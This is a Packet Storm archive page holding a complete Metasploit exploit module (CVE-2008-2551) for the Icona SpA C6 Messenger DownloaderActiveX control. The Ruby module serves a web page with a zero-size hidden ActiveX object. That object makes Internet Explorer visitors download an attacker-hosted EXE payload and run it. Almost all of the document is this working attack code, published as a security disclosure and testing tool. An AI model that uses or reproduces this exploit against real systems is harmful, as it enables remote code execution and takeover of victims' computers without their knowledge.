what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Icona SpA C6 Messenger Downloader Arbitrary File Download / Execute

Icona SpA C6 Messenger Downloader Arbitrary File Download / Execute
Posted Feb 3, 2012
Authored by juan vazquez, Nine:Situations:Group::SnoopyAssault | Site metasploit.com

This Metasploit module exploits a vulnerability in Icona SpA C6 Messenger version 1.0.0.1. The vulnerability is in the Downloader ActiveX Control (DownloaderActiveX.ocx). The insecure control can be abused to download and execute arbitrary files in the context of the currently logged-on user.

tags | exploit, arbitrary, activex
advisories | CVE-2008-2551, OSVDB-45960
SHA-256 | 5ff82482c6d0cc8cb96eb23172d540f4d5ded54210dbc21fe3ea60715403632a

Icona SpA C6 Messenger Downloader Arbitrary File Download / Execute

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',
'Description' => %q{
This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The
vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The
insecure control can be abused to download and execute arbitrary files in the context of
the currently logged-on user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit
'juan vazquez' # metasploit module
],
'References' =>
[
[ 'CVE', '2008-2551' ],
[ 'OSVDB', '45960' ],
[ 'BID', '29519' ],
[ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ],
],
'DefaultOptions' =>
{
'ExitFunction' => "none",
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jun 03 2008',
'DefaultTarget' => 0,
'Privileged' => false))
end

def autofilter
false
end

def check_dependencies
use_zlib
end

def on_request_uri(cli, request)

# Only IEs are potential targets
# "File Session" is used when the ActiveX tries to request the EXE
agent = request.headers['User-Agent']
if agent !~ /MSIE \d\.\d|File Session/
print_error("Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})")
return
end

payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/#{@payload_rand}"

if (request.uri.match(/#{@payload_rand}/))
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end

exe = rand_text_alpha(rand(5) + 1 )

content = %Q|
<html>
<object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
<param name="propProgressBackground" value="#bccee8">
<param name="propTextBackground" value="#f7f8fc">
<param name="propBarColor" value="#df0203">
<param name="propTextColor" value="#000000">
<param name="propWidth" value="0">
<param name="propHeight" value="0">
<param name="propDownloadUrl" value="#{payload_url}/#{exe}.exe">
<param name="propPostDownloadAction" value="run">
<param name="propInstallCompleteUrl" value="">
<param name="propBrowserRedirectUrl" value="">
<param name="propVerbose" value="0">
<param name="propInterrupt" value="0">
</OBJECT>
</html>
|

print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

send_response_html(cli, content)

handler(cli)

end

def exploit
@payload_rand = rand_text_alpha(rand(5) + 5 )
super
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    47 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close